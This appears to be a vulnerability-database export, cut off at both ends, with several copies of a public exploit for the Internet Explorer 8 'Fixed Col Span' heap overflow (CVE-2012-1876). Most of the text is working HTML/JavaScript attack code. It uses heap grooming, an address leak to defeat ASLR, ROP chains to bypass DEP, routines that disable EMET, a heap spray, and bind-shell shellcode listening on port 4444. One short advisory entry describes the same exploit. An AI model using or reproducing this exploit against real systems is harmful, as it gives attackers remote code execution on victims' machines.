unescape(\"%u\"+rop13+\"%u\"+rop14); // POP EDI\r\n shellcode+= unescape(\"%u\"+rop1+\"%u\"+rop2); // RET\r\n shellcode+= unescape(\"%u\"+rop15+\"%u\"+rop16); // POP ESI\r\n shellcode+= unescape(\"%u\"+jmpeax1+\"%u\"+jmpeax2); // JMP EAX\r\n shellcode+= unescape(\"%u\"+rop17+\"%u\"+rop18); // POP EAX\r\n shellcode+= unescape(\"%u\"+vp1+\"%u\"+vp2); // VirtualProtect()\r\n shellcode+= unescape(\"%u\"+rop19+\"%u\"+rop20); // MOV EAX,DWORD PTR DS:[EAX]\r\n shellcode+= unescape(\"%u\"+rop21+\"%u\"+rop22); // PUSHAD\r\n shellcode+= unescape(\"%u\"+rop23+\"%u\"+rop24); // PUSH ESP\r\n shellcode+= unescape(\"%u9090%u9090\"); // NOPs\r\n \r\n // EMET disable part 0x02\r\n // Execute the Corbomite bluff to disarm EAF\r\n shellcode+= unescape(\"%uc8b8%u6d10\");\r\n shellcode+= unescape(\"%u8b07%u8b00\");\r\n shellcode+= unescape(\"%u6800%u10d0\");\r\n shellcode+= unescape(\"%u076d%ud0ff\");\r\n shellcode+= unescape(\"%udc68%u6d10\");\r\n shellcode+= unescape(\"%u5007%uccb8\");\r\n shellcode+= unescape(\"%u6d10%u8b07\");\r\n shellcode+= unescape(\"%u8b00%uff00\");\r\n shellcode+= unescape(\"%u8bd0%u81f0\");\r\n shellcode+= unescape(\"%uccec%u0002\");\r\n shellcode+= unescape(\"%uc700%u2404\");\r\n shellcode+= unescape(\"%u0010%u0001\");\r\n shellcode+= unescape(\"%ufc8b%uccb9\");\r\n shellcode+= unescape(\"%u0002%u8300\");\r\n shellcode+= unescape(\"%u04c7%ue983\");\r\n shellcode+= unescape(\"%u3304%uf3c0\");\r\n shellcode+= unescape(\"%u54aa%ufe6a\");\r\n shellcode+= unescape(\"%ud6ff%u9090\");\r\n shellcode+= unescape(\"%u9090%u9090\"); // NOPs\r\n shellcode+= unescape(\"%u9090%u29eb\"); // NOPs\r\n shellcode+= unescape(\"%u\"+getmodulew1+\"%u\"+getmodulew2); // GetModuleHandleW\r\n shellcode+= unescape(\"%u\"+getprocaddr1+\"%u\"+getprocaddr2); // GetProcAddress\r\n shellcode+= \"NTDLL\";\r\n shellcode+= unescape(\"%u0000\");\r\n shellcode+= unescape(\"%u744e%u6553\"); // NtSetContextThread\r\n shellcode+= unescape(\"%u4374%u6e6f\");\r\n shellcode+= unescape(\"%u6574%u7478\");\r\n shellcode+= unescape(\"%u6854%u6572\");\r\n shellcode+= unescape(\"%u6461%u0000\");\r\n shellcode+= unescape(\"%u9090%u9090\"); // NOPs\r\n shellcode+= unescape(\"%u9090%u9090\"); // NOPs\r\n // EMET disable part 0x02 end\r\n \r\n // Bind shellcode on 4444 :)\r\n // msf > generate -t js_le\r\n // windows/shell_bind_tcp - 342 bytes\r\n // http://www.metasploit.com\r\n // VERBOSE=false, LPORT=4444, RHOST=, PrependMigrate=false,\r\n // EXITFUNC=process, InitialAutoRunScript=, AutoRunScript=\r\n // I would keep the shellcode the same size for better reliability :)\r\n \r\n shellcode+= unescape(\"%ue8fc%u0089%u0000%u8960%u31e5%u64d2%u528b\" +\r\n \"%u8b30%u0c52%u528b%u8b14%u2872%ub70f%u264a\" +\r\n \"%uff31%uc031%u3cac%u7c61%u2c02%uc120%u0dcf\" +\r\n \"%uc701%uf0e2%u5752%u528b%u8b10%u3c42%ud001\" +\r\n \"%u408b%u8578%u74c0%u014a%u50d0%u488b%u8b18\" +\r\n \"%u2058%ud301%u3ce3%u8b49%u8b34%ud601%uff31\" +\r\n \"%uc031%uc1ac%u0dcf%uc701%ue038%uf475%u7d03\" +\r\n \"%u3bf8%u247d%ue275%u8b58%u2458%ud301%u8b66\" +\r\n \"%u4b0c%u588b%u011c%u8bd3%u8b04%ud001%u4489\" +\r\n \"%u2424%u5b5b%u5961%u515a%ue0ff%u5f58%u8b5a\" +\r\n \"%ueb12%u5d86%u3368%u0032%u6800%u7377%u5f32\" +\r\n \"%u6854%u774c%u0726%ud5ff%u90b8%u0001%u2900\" +\r\n \"%u54c4%u6850%u8029%u006b%ud5ff%u5050%u5050\" +\r\n \"%u5040%u5040%uea68%udf0f%uffe0%u89d5%u31c7\" +\r\n \"%u53db%u0268%u1100%u895c%u6ae6%u5610%u6857\" +\r\n \"%udbc2%u6737%ud5ff%u5753%ub768%u38e9%uffff\" +\r\n \"%u53d5%u5753%u7468%u3bec%uffe1%u57d5%uc789\" +\r\n \"%u7568%u4d6e%uff61%u68d5%u6d63%u0064%ue389\" +\r\n \"%u5757%u3157%u6af6%u5912%ue256%u66fd%u44c7\" +\r\n \"%u3c24%u0101%u448d%u1024%u00c6%u5444%u5650\" +\r\n \"%u5656%u5646%u564e%u5356%u6856%ucc79%u863f\" +\r\n \"%ud5ff%ue089%u564e%uff46%u6830%u8708%u601d\" +\r\n \"%ud5ff%uf0bb%ua2b5%u6856%u95a6%u9dbd%ud5ff\" +\r\n \"%u063c%u0a7c%ufb80%u75e0%ubb05%u1347%u6f72\" +\r\n \"%u006a%uff53%u41d5\");\r\n \r\n // Total spray should be 1000\r\n var padding = unescape(\"%u9090\");\r\n while (padding.length < 1000)\r\n padding = padding + padding;\r\n var padding = padding.substr(0, 1000 - shellcode.length);\r\n \r\n shellcode+= padding;\r\n \r\n while (shellcode.length < 100000)\r\n shellcode = shellcode + shellcode;\r\n \r\n var onemeg = shellcode.substr(0, 64*1024/2);\r\n \r\n for (i=0; i<14; i++) {\r\n onemeg += shellcode.substr(0, 64*1024/2);\r\n }\r\n \r\n onemeg += shellcode.substr(0, (64*1024/2)-(38/2));\r\n \r\n var spray = new Array();\r\n \r\n for (i=0; i<100; i++) {\r\n spray[i] = onemeg.substr(0, onemeg.length);\r\n }\r\n}\r\n \r\nfunction leak(){\r\n var leak_col = document.getElementById(\"132\");\r\n leak_col.width = \"41\";\r\n leak_col.span = \"19\";\r\n}\r\n \r\nfunction get_leak() {\r\n var str_addr = strtoint(bl[498].substring((0x100-6)/2+11,(0x100-6)/2+13));\r\n str_addr = str_addr - 1410704;\r\n var hex = str_addr.toString(16);\r\n //alert(hex);\r\n setTimeout(function(){heapspray(str_addr)}, 50);\r\n}\r\n \r\nfunction trigger_overflow(){\r\n var evil_col = document.getElementById(\"132\");\r\n evil_col.width = \"1245880\";\r\n evil_col.span = \"44\";\r\n}\r\n \r\nsetTimeout(function(){leak()}, 400);\r\nsetTimeout(function(){get_leak()},450);\r\nsetTimeout(function(){trigger_overflow()}, 700);\r\n \r\n</script>\r\n</body>\r\n</html>\n\n# 0day.today [2018-01-03] #", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://0day.today/exploit/22396"}], "canvas": [{"lastseen": "2019-05-29T19:48:25", "bulletinFamily": "exploit", "cvelist": ["CVE-2012-1876"], "edition": 2, "description": "**Name**| ms12_037 \n---|--- \n**CVE**| CVE-2012-1876 \n**Exploit Pack**| [CANVAS](<http://http://www.immunityinc.com/products-canvas.shtml>) \n**Description**| MS12-037 Microsoft Internet Explorer Fixed Table Col Span Heap Overflow \n**Notes**| CVE Name: CVE-2012-1876 \nVENDOR: Microsoft \nNotes: \nSome information regarding this exploit: \n\\- It uses an information leak so does not depend of third party software. \n\\- It works with js_recon \n\\- It only works if the template is set as the exploit itself \n \nTested on: \n* Windows XP Professional SP3 English with Internet Explorer 8 \n* Windows 7 English / Internet Explorer 8. \n \nTested on the following mshtml.dll versions: \n* v80760016625 - unpatched install \n* v80760117514 - some patchs \n* v90811216447 - all patchs except for ms12-037 patch \n \n**Important** Do not use a template other than the exploit itself! \n \nVersionsAffected: Internet Explorer 6/7/8/9 \nRepeatability: \nMSADV: MS12-037 \nReferences: http://technet.microsoft.com/en-us/security/bulletin/ms12-037 \nCVE Url: http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2012-1876 \nDate public: 06/12/2012 \nCVSS: 9.5 \n\n", "modified": "2012-06-12T22:55:00", "published": "2012-06-12T22:55:00", "id": "MS12_037", "href": "http://exploitlist.immunityinc.com/home/exploitpack/CANVAS/ms12_037", "type": "canvas", "title": "Immunity Canvas: MS12_037", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "packetstorm": [{"lastseen": "2016-12-05T22:14:47", "description": "", "published": "2013-01-11T00:00:00", "type": "packetstorm", "title": "Internet Explorer 8 Heap Overflow", "bulletinFamily": "exploit", "cvelist": ["CVE-2012-1876"], "modified": "2013-01-11T00:00:00", "id": "PACKETSTORM:119467", "href": "https://packetstormsecurity.com/files/119467/Internet-Explorer-8-Heap-Overflow.html", "sourceData": "`<!-- \n** Exploit Title: Internet Explorer 8 Fixed Col Span ID full ASLR & DEP bypass \n** Author: sickness@offsec.com \n** Thanks to Ryujin and Dookie for their help. \n \n#################################################################### \n \n** Affected Software: Internet Explorer 8 \n** Vulnerability: Fixed Col Span ID \n** CVE: CVE-2012-1876 \n** Metasploit exploit using NON-ASLR DLL: http://dev.metasploit.com/redmine/projects/framework/repository/entry/modules/exploits/windows/browser/ms12_037_ie_colspan.rb \n** Vupen Blog post: http://www.vupen.com/blog/20120710.Advanced_Exploitation_of_Internet_Explorer_HeapOv_CVE-2012-1876.php \n** Tested on Windows 7 (x86) - IE 8.0.7601.17514 \n \n#################################################################### \n \n** The exploit bypasses ASLR without the need of any NON-ASLR dll's using a leak :) \n** To get it working on a different version of Windows you will require to make your own chances to the exploit :) \n** Have fun :) \n--> \n \n<html> \n<body> \n<div id=\"evil\"></div> \n<table style=\"table-layout:fixed\" ><col id=\"132\" width=\"41\" span=\"9\" > </col></table> \n<script language='javascript'> \n \nfunction strtoint(str) { \nreturn str.charCodeAt(1)*0x10000 + str.charCodeAt(0); \n} \n \nvar free = \"EEEE\"; \nwhile ( free.length < 500 ) free += free; \n \nvar string1 = \"AAAA\"; \nwhile ( string1.length < 500 ) string1 += string1; \n \nvar string2 = \"BBBB\"; \nwhile ( string2.length < 500 ) string2 += string2; \n \nvar fr = new Array(); \nvar al = new Array(); \nvar bl = new Array(); \n \nvar div_container = document.getElementById(\"evil\"); \ndiv_container.style.cssText = \"display:none\"; \n \nfor (var i=0; i < 500; i+=2) { \nfr[i] = free.substring(0, (0x100-6)/2); \nal[i] = string1.substring(0, (0x100-6)/2); \nbl[i] = string2.substring(0, (0x100-6)/2); \nvar obj = document.createElement(\"button\"); \ndiv_container.appendChild(obj); \n} \n \nfor (var i=200; i<500; i+=2 ) { \nfr[i] = null; \nCollectGarbage(); \n} \n \nfunction heapspray(cbuttonlayout) { \nCollectGarbage(); \nvar rop = cbuttonlayout + 4161; // RET \nvar rop = rop.toString(16); \nvar rop1 = rop.substring(4,8); \nvar rop2 = rop.substring(0,4); // } RET \n \nvar rop = cbuttonlayout + 11360; // POP EBP \nvar rop = rop.toString(16); \nvar rop3 = rop.substring(4,8); \nvar rop4 = rop.substring(0,4); // } RET \n \nvar rop = cbuttonlayout + 111675; // XCHG EAX,ESP \nvar rop = rop.toString(16); \nvar rop5 = rop.substring(4,8); \nvar rop6 = rop.substring(0,4); // } RET \n \nvar rop = cbuttonlayout + 12377; // POP EBX \nvar rop = rop.toString(16); \nvar rop7 = rop.substring(4,8); \nvar rop8 = rop.substring(0,4); // } RET \n \nvar rop = cbuttonlayout + 642768; // POP EDX \nvar rop = rop.toString(16); \nvar rop9 = rop.substring(4,8); \nvar rop10 = rop.substring(0,4); // } RET \n \nvar rop = cbuttonlayout + 12201; // POP ECX --> Changed \nvar rop = rop.toString(16); \nvar rop11 = rop.substring(4,8); \nvar rop12 = rop.substring(0,4); // } RET \n \nvar rop = cbuttonlayout + 5504544; // Writable location \nvar rop = rop.toString(16); \nvar writable1 = rop.substring(4,8); \nvar writable2 = rop.substring(0,4); // } RET \n \nvar rop = cbuttonlayout + 12462; // POP EDI \nvar rop = rop.toString(16); \nvar rop13 = rop.substring(4,8); \nvar rop14 = rop.substring(0,4); // } RET \n \nvar rop = cbuttonlayout + 12043; // POP ESI --> changed \nvar rop = rop.toString(16); \nvar rop15 = rop.substring(4,8); \nvar rop16 = rop.substring(0,4); // } RET \n \nvar rop = cbuttonlayout + 63776; // JMP EAX \nvar rop = rop.toString(16); \nvar jmpeax1 = rop.substring(4,8); \nvar jmpeax2 = rop.substring(0,4); // } RET \n \nvar rop = cbuttonlayout + 85751; // POP EAX \nvar rop = rop.toString(16); \nvar rop17 = rop.substring(4,8); \nvar rop18 = rop.substring(0,4); // } RET \n \nvar rop = cbuttonlayout + 4936; // VirtualProtect() \nvar rop = rop.toString(16); \nvar vp1 = rop.substring(4,8); \nvar vp2 = rop.substring(0,4); // } RET \n \nvar rop = cbuttonlayout + 454843; // MOV EAX,DWORD PTR DS:[EAX] \nvar rop = rop.toString(16); \nvar rop19 = rop.substring(4,8); \nvar rop20 = rop.substring(0,4); // } RET \n \nvar rop = cbuttonlayout + 234657; // PUSHAD \nvar rop = rop.toString(16); \nvar rop21 = rop.substring(4,8); \nvar rop22 = rop.substring(0,4); // } RET \n \n \nvar rop = cbuttonlayout + 408958; // PUSH ESP \nvar rop = rop.toString(16); \nvar rop23 = rop.substring(4,8); \nvar rop24 = rop.substring(0,4); // } RET \n \nvar shellcode = unescape(\"%u\"+rop1+\"%u\"+rop2); // RET \nshellcode+= unescape(\"%u\"+rop3+\"%u\"+rop4); // POP EBP \nshellcode+= unescape(\"%u\"+rop5+\"%u\"+rop6); // XCHG EAX,ESP \nshellcode+= unescape(\"%u\"+rop3+\"%u\"+rop4); // POP EBP \nshellcode+= unescape(\"%u\"+rop3+\"%u\"+rop4); // POP EBP \nshellcode+= unescape(\"%u\"+rop7+\"%u\"+rop8); // POP EBP \nshellcode+= unescape(\"%u1024%u0000\"); // Size 0x00001024 \nshellcode+= unescape(\"%u\"+rop9+\"%u\"+rop10); // POP EDX \nshellcode+= unescape(\"%u0040%u0000\"); // 0x00000040 \nshellcode+= unescape(\"%u\"+rop11+\"%u\"+rop12); // POP ECX \nshellcode+= unescape(\"%u\"+writable1+\"%u\"+writable2); // Writable Location \nshellcode+= unescape(\"%u\"+rop13+\"%u\"+rop14); // POP EDI \nshellcode+= unescape(\"%u\"+rop1+\"%u\"+rop2); // RET \nshellcode+= unescape(\"%u\"+rop15+\"%u\"+rop16); // POP ESI \nshellcode+= unescape(\"%u\"+jmpeax1+\"%u\"+jmpeax2); // JMP EAX \nshellcode+= unescape(\"%u\"+rop17+\"%u\"+rop18); // POP EAX \nshellcode+= unescape(\"%u\"+vp1+\"%u\"+vp2); // VirtualProtect() \nshellcode+= unescape(\"%u\"+rop19+\"%u\"+rop20); // MOV EAX,DWORD PTR DS:[EAX] \nshellcode+= unescape(\"%u\"+rop21+\"%u\"+rop22); // PUSHAD \nshellcode+= unescape(\"%u\"+rop23+\"%u\"+rop24); // PUSH ESP \nshellcode+= unescape(\"%u9090%u9090\"); // crap \nshellcode+= unescape(\"%u9090%u9090\"); // crap \n \n// Bind shellcode on 4444 :) \nshellcode+= unescape(\"%ue8fc%u0089%u0000%u8960%u31e5%u64d2%u528b\" + \n\"%u8b30%u0c52%u528b%u8b14%u2872%ub70f%u264a\" + \n\"%uff31%uc031%u3cac%u7c61%u2c02%uc120%u0dcf\" + \n\"%uc701%uf0e2%u5752%u528b%u8b10%u3c42%ud001\" + \n\"%u408b%u8578%u74c0%u014a%u50d0%u488b%u8b18\" + \n\"%u2058%ud301%u3ce3%u8b49%u8b34%ud601%uff31\" + \n\"%uc031%uc1ac%u0dcf%uc701%ue038%uf475%u7d03\" + \n\"%u3bf8%u247d%ue275%u8b58%u2458%ud301%u8b66\" + \n\"%u4b0c%u588b%u011c%u8bd3%u8b04%ud001%u4489\" + \n\"%u2424%u5b5b%u5961%u515a%ue0ff%u5f58%u8b5a\" + \n\"%ueb12%u5d86%u3368%u0032%u6800%u7377%u5f32\" + \n\"%u6854%u774c%u0726%ud5ff%u90b8%u0001%u2900\" + \n\"%u54c4%u6850%u8029%u006b%ud5ff%u5050%u5050\" + \n\"%u5040%u5040%uea68%udf0f%uffe0%u89d5%u31c7\" + \n\"%u53db%u0268%u1100%u895c%u6ae6%u5610%u6857\" + \n\"%udbc2%u6737%ud5ff%u5753%ub768%u38e9%uffff\" + \n\"%u53d5%u5753%u7468%u3bec%uffe1%u57d5%uc789\" + \n\"%u7568%u4d6e%uff61%u68d5%u6d63%u0064%ue389\" + \n\"%u5757%u3157%u6af6%u5912%ue256%u66fd%u44c7\" + \n\"%u3c24%u0101%u448d%u1024%u00c6%u5444%u5650\" + \n\"%u5656%u5646%u564e%u5356%u6856%ucc79%u863f\" + \n\"%ud5ff%ue089%u564e%uff46%u6830%u8708%u601d\" + \n\"%ud5ff%uf0bb%ua2b5%u6856%u95a6%u9dbd%ud5ff\" + \n\"%u063c%u0a7c%ufb80%u75e0%ubb05%u1347%u6f72\" + \n\"%u006a%uff53%u41d5\"); \n \n \n \nwhile (shellcode.length < 100000) \nshellcode = shellcode + shellcode; \n \nvar onemeg = shellcode.substr(0, 64*1024/2); \n \nfor (i=0; i<14; i++) { \nonemeg += shellcode.substr(0, 64*1024/2); \n} \n \nonemeg += shellcode.substr(0, (64*1024/2)-(38/2)); \n \nvar spray = new Array(); \n \nfor (i=0; i<100; i++) { \nspray[i] = onemeg.substr(0, onemeg.length); \n} \n} \n \nfunction leak(){ \nvar leak_col = document.getElementById(\"132\"); \nleak_col.width = \"41\"; \nleak_col.span = \"19\"; \n} \n \nfunction get_leak() { \nvar str_addr = strtoint(bl[498].substring((0x100-6)/2+11,(0x100-6)/2+13)); \nstr_addr = str_addr - 1410704; \nsetTimeout(function(){heapspray(str_addr)}, 200); \n} \n \nfunction trigger_overflow(){ \nvar evil_col = document.getElementById(\"132\"); \nevil_col.width = \"1178993\"; \nevil_col.span = \"44\"; \n} \n \nsetTimeout(function(){leak()}, 300); \nsetTimeout(function(){get_leak()},700); \n//setTimeout(function(){heapspray()}, 900); \nsetTimeout(function(){trigger_overflow()}, 1200); \n \n</script> \n</body> \n</html> \n \n`\n", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://packetstormsecurity.com/files/download/119467/ie8fixedcol-overflow.txt"}, {"lastseen": "2016-12-05T22:21:07", "description": "", "published": "2014-07-01T00:00:00", "type": "packetstorm", "title": "Internet Explorer 8 Bypass", "bulletinFamily": "exploit", "cvelist": ["CVE-2012-1876"], "modified": "2014-07-01T00:00:00", "id": "PACKETSTORM:127316", "href": "https://packetstormsecurity.com/files/127316/Internet-Explorer-8-Bypass.html", "sourceData": "`<!-- \n** Internet Explorer 8 Fixed Col Span ID full ASLR, DEP and EMET 4.1.X bypass \n** Offensive Security Research Team \n** http://www.offensive-security.com/vulndev/disarming-enhanced-mitigation-experience-toolkit-emet \n** Affected Software: Internet Explorer 8 \n** Vulnerability: Fixed Col Span ID \n** CVE: CVE-2012-1876 \n** Tested on Windows 7 (x86) - IE 8.0.7601.17514 & EMET 4.1.X \n--> \n \n<html> \n<body> \n<div id=\"evil\"></div> \n<table style=\"table-layout:fixed\" ><col id=\"132\" width=\"41\" span=\"9\" > </col></table> \n<script language='javascript'> \n \nfunction strtoint(str) { \nreturn str.charCodeAt(1)*0x10000 + str.charCodeAt(0); \n} \n \nvar free = \"EEEE\"; \nwhile ( free.length < 500 ) free += free; \n \nvar string1 = \"AAAA\"; \nwhile ( string1.length < 500 ) string1 += string1; \n \nvar string2 = \"BBBB\"; \nwhile ( string2.length < 500 ) string2 += string2; \n \nvar fr = new Array(); \nvar al = new Array(); \nvar bl = new Array(); \n \nvar div_container = document.getElementById(\"evil\"); \ndiv_container.style.cssText = \"display:none\"; \n \nfor (var i=0; i < 500; i+=2) { \nfr[i] = free.substring(0, (0x100-6)/2); \nal[i] = string1.substring(0, (0x100-6)/2); \nbl[i] = string2.substring(0, (0x100-6)/2); \nvar obj = document.createElement(\"button\"); \ndiv_container.appendChild(obj); \n} \n \nfor (var i=200; i<500; i+=2 ) { \nfr[i] = null; \nCollectGarbage(); \n} \n \nfunction heapspray(cbuttonlayout) { \nCollectGarbage(); \nvar rop = cbuttonlayout + 4161; // RET \nvar rop = rop.toString(16); \nvar rop1 = rop.substring(4,8); \nvar rop2 = rop.substring(0,4); // } RET \n \nvar rop = cbuttonlayout + 11360; // POP EBP \nvar rop = rop.toString(16); \nvar rop3 = rop.substring(4,8); \nvar rop4 = rop.substring(0,4); // } RET \n \nvar rop = cbuttonlayout + 111675; // XCHG EAX,ESP \nvar rop = rop.toString(16); \nvar rop5 = rop.substring(4,8); \nvar rop6 = rop.substring(0,4); // } RET \n \nvar rop = cbuttonlayout + 12377; // POP EBX \nvar rop = rop.toString(16); \nvar rop7 = rop.substring(4,8); \nvar rop8 = rop.substring(0,4); // } RET \n \nvar rop = cbuttonlayout + 642768; // POP EDX \nvar rop = rop.toString(16); \nvar rop9 = rop.substring(4,8); \nvar rop10 = rop.substring(0,4); // } RET \n \nvar rop = cbuttonlayout + 12201; // POP ECX --> Changed \nvar rop = rop.toString(16); \nvar rop11 = rop.substring(4,8); \nvar rop12 = rop.substring(0,4); // } RET \n \nvar rop = cbuttonlayout + 5504544; // Writable location \nvar rop = rop.toString(16); \nvar writable1 = rop.substring(4,8); \nvar writable2 = rop.substring(0,4); // } RET \n \nvar rop = cbuttonlayout + 12462; // POP EDI \nvar rop = rop.toString(16); \nvar rop13 = rop.substring(4,8); \nvar rop14 = rop.substring(0,4); // } RET \n \nvar rop = cbuttonlayout + 12043; // POP ESI --> changed \nvar rop = rop.toString(16); \nvar rop15 = rop.substring(4,8); \nvar rop16 = rop.substring(0,4); // } RET \n \nvar rop = cbuttonlayout + 63776; // JMP EAX \nvar rop = rop.toString(16); \nvar jmpeax1 = rop.substring(4,8); \nvar jmpeax2 = rop.substring(0,4); // } RET \n \nvar rop = cbuttonlayout + 85751; // POP EAX \nvar rop = rop.toString(16); \nvar rop17 = rop.substring(4,8); \nvar rop18 = rop.substring(0,4); // } RET \n \nvar rop = cbuttonlayout + 4936; // VirtualProtect() \nvar rop = rop.toString(16); \nvar vp1 = rop.substring(4,8); \nvar vp2 = rop.substring(0,4); // } RET \n \nvar rop = cbuttonlayout + 454843; // MOV EAX,DWORD PTR DS:[EAX] \nvar rop = rop.toString(16); \nvar rop19 = rop.substring(4,8); \nvar rop20 = rop.substring(0,4); // } RET \n \nvar rop = cbuttonlayout + 234657; // PUSHAD \nvar rop = rop.toString(16); \nvar rop21 = rop.substring(4,8); \nvar rop22 = rop.substring(0,4); // } RET \n \n \nvar rop = cbuttonlayout + 408958; // PUSH ESP \nvar rop = rop.toString(16); \nvar rop23 = rop.substring(4,8); \nvar rop24 = rop.substring(0,4); // } RET \n \nvar rop = cbuttonlayout + 2228408; // POP ECX \nvar rop = rop.toString(16); \nvar rop25 = rop.substring(4,8); \nvar rop26 = rop.substring(0,4); // } RET \n \nvar rop = cbuttonlayout + 1586172; // POP EAX \nvar rop = rop.toString(16); \nvar rop27 = rop.substring(4,8); \nvar rop28 = rop.substring(0,4); // } RET \n \nvar rop = cbuttonlayout + 1589179; // MOV EAX,DWORD PTR [EAX] \nvar rop = rop.toString(16); \nvar rop29 = rop.substring(4,8); \nvar rop30 = rop.substring(0,4); // } RET \n \nvar rop = cbuttonlayout + 1884912; // PUSH EAX \nvar rop = rop.toString(16); \nvar rop31 = rop.substring(4,8); \nvar rop32 = rop.substring(0,4); // } RET \n \nvar rop = cbuttonlayout + 2140694; // ADD EAX,ECX \nvar rop = rop.toString(16); \nvar rop33 = rop.substring(4,8); \nvar rop34 = rop.substring(0,4); // } RET \n \nvar rop = cbuttonlayout + 2364867; // MOV DWORD PTR [EAX],ECX \nvar rop = rop.toString(16); \nvar rop35 = rop.substring(4,8); \nvar rop36 = rop.substring(0,4); // } RET \n \nvar rop = cbuttonlayout + 5036248; // ADD ESP,0C \nvar rop = rop.toString(16); \nvar rop37 = rop.substring(4,8); \nvar rop38 = rop.substring(0,4); // } RET \n \nvar getmodulew = cbuttonlayout + 4840; // GetModuleHandleW \nvar getmodulew = getmodulew.toString(16); \nvar getmodulew1 = getmodulew.substring(4,8); \nvar getmodulew2 = getmodulew.substring(0,4); // } RET \n \nvar getprocaddr = cbuttonlayout + 4836; // GetProcAddress \nvar getprocaddr = getprocaddr.toString(16); \nvar getprocaddr1 = getprocaddr.substring(4,8); \nvar getprocaddr2 = getprocaddr.substring(0,4); // } RET \n \nvar shellcode = unescape(\"%u4141%u4141%u4242%u4242%u4343%u4343\"); // PADDING \nshellcode+= unescape(\"%u4141%u4141%u4242%u4242%u4343%u4343\"); // PADDING \nshellcode+= unescape(\"%u4141%u4141\"); // PADDING \n \nshellcode+= unescape(\"%u\"+rop1+\"%u\"+rop2); // RETN \nshellcode+= unescape(\"%u\"+rop3+\"%u\"+rop4); // POP EBP # RETN \nshellcode+= unescape(\"%u\"+rop5+\"%u\"+rop6); // XCHG EAX,ESP # RETN \n \n// EMET disable part 0x01 \n// Implement the Tachyon detection grid to overcome the Romulan cloaking device. \nshellcode+= unescape(\"%u\"+rop27+\"%u\"+rop28); // POP EAX # RETN \nshellcode+= unescape(\"%u\"+getmodulew1+\"%u\"+getmodulew2); // GetModuleHandleW \nshellcode+= unescape(\"%u\"+rop29+\"%u\"+rop30); // MOV EAX,DWORD PTR [EAX] # RETN \nshellcode+= unescape(\"%u\"+rop31+\"%u\"+rop32); // PUSH EAX # RETN \nshellcode+= unescape(\"%u\"+rop25+\"%u\"+rop26); // POP ECX # RETN \nshellcode+= unescape(\"%u101C%u076d\"); // EMET string \nshellcode+= unescape(\"%ue220%u0007\"); // EMET offset \nshellcode+= unescape(\"%u\"+rop33+\"%u\"+rop34); // ADD EAX,ECX # RETN \nshellcode+= unescape(\"%u\"+rop25+\"%u\"+rop26); // POP ECX # RETN \nshellcode+= unescape(\"%u0000%u0000\"); // Zero out ECX \nshellcode+= unescape(\"%u\"+rop35+\"%u\"+rop36); // MOV DWORD PTR [EAX],ECX # RETN \nshellcode+= unescape(\"%u\"+rop37+\"%u\"+rop38); // ADD ESP,0C # RETN \nshellcode+= \"EMET\"; // EMET string \nshellcode+= unescape(\"%u0000%u0000\"); // EMET string \n// EMET disable part 0x01 end \n \n// Performing a standard Kumeh maneuver ... (VirtualProtect mona chain) \nshellcode+= unescape(\"%u\"+rop3+\"%u\"+rop4); // POP EBP \nshellcode+= unescape(\"%u\"+rop3+\"%u\"+rop4); // POP EBP \nshellcode+= unescape(\"%u\"+rop7+\"%u\"+rop8); // POP EBP \nshellcode+= unescape(\"%u1024%u0000\"); // Size 0x00001024 \nshellcode+= unescape(\"%u\"+rop9+\"%u\"+rop10); // POP EDX \nshellcode+= unescape(\"%u0040%u0000\"); // 0x00000040 \nshellcode+= unescape(\"%u\"+rop11+\"%u\"+rop12); // POP ECX \nshellcode+= unescape(\"%u\"+writable1+\"%u\"+writable2); // Writable Location \nshellcode+= unescape(\"%u\"+rop13+\"%u\"+rop14); // POP EDI \nshellcode+= unescape(\"%u\"+rop1+\"%u\"+rop2); // RET \nshellcode+= unescape(\"%u\"+rop15+\"%u\"+rop16); // POP ESI \nshellcode+= unescape(\"%u\"+jmpeax1+\"%u\"+jmpeax2); // JMP EAX \nshellcode+= unescape(\"%u\"+rop17+\"%u\"+rop18); // POP EAX \nshellcode+= unescape(\"%u\"+vp1+\"%u\"+vp2); // VirtualProtect() \nshellcode+= unescape(\"%u\"+rop19+\"%u\"+rop20); // MOV EAX,DWORD PTR DS:[EAX] \nshellcode+= unescape(\"%u\"+rop21+\"%u\"+rop22); // PUSHAD \nshellcode+= unescape(\"%u\"+rop23+\"%u\"+rop24); // PUSH ESP \nshellcode+= unescape(\"%u9090%u9090\"); // NOPs \n \n// EMET disable part 0x02 \n// Execute the Corbomite bluff to disarm EAF \nshellcode+= unescape(\"%uc0b8%u6d10\"); \nshellcode+= unescape(\"%u8b07%u8b00\"); \nshellcode+= unescape(\"%u6800%u10c8\"); \nshellcode+= unescape(\"%u076d%ud0ff\"); \nshellcode+= unescape(\"%ud468%u6d10\"); \nshellcode+= unescape(\"%u5007%uc4b8\"); \nshellcode+= unescape(\"%u6d10%u8b07\"); \nshellcode+= unescape(\"%u8b00%uff00\"); \nshellcode+= unescape(\"%u8bd0%u81f0\"); \nshellcode+= unescape(\"%uccec%u0002\"); \nshellcode+= unescape(\"%uc700%u2404\"); \nshellcode+= unescape(\"%u0010%u0001\"); \nshellcode+= unescape(\"%ufc8b%uccb9\"); \nshellcode+= unescape(\"%u0002%u8300\"); \nshellcode+= unescape(\"%u04c7%ue983\"); \nshellcode+= unescape(\"%u3304%uf3c0\"); \nshellcode+= unescape(\"%u54aa%ufe6a\"); \nshellcode+= unescape(\"%ud6ff%u9090\"); \nshellcode+= unescape(\"%u9090%u9090\"); // NOPs \nshellcode+= unescape(\"%u9090%u29eb\"); // NOPs \nshellcode+= unescape(\"%u\"+getmodulew1+\"%u\"+getmodulew2); // GetModuleHandleW \nshellcode+= unescape(\"%u\"+getprocaddr1+\"%u\"+getprocaddr2); // GetProcAddress \nshellcode+= \"NTDLL\"; \nshellcode+= unescape(\"%u0000\"); \nshellcode+= unescape(\"%u744e%u6553\"); // NtSetContextThread \nshellcode+= unescape(\"%u4374%u6e6f\"); \nshellcode+= unescape(\"%u6574%u7478\"); \nshellcode+= unescape(\"%u6854%u6572\"); \nshellcode+= unescape(\"%u6461%u0000\"); \nshellcode+= unescape(\"%u9090%u9090\"); // NOPs \nshellcode+= 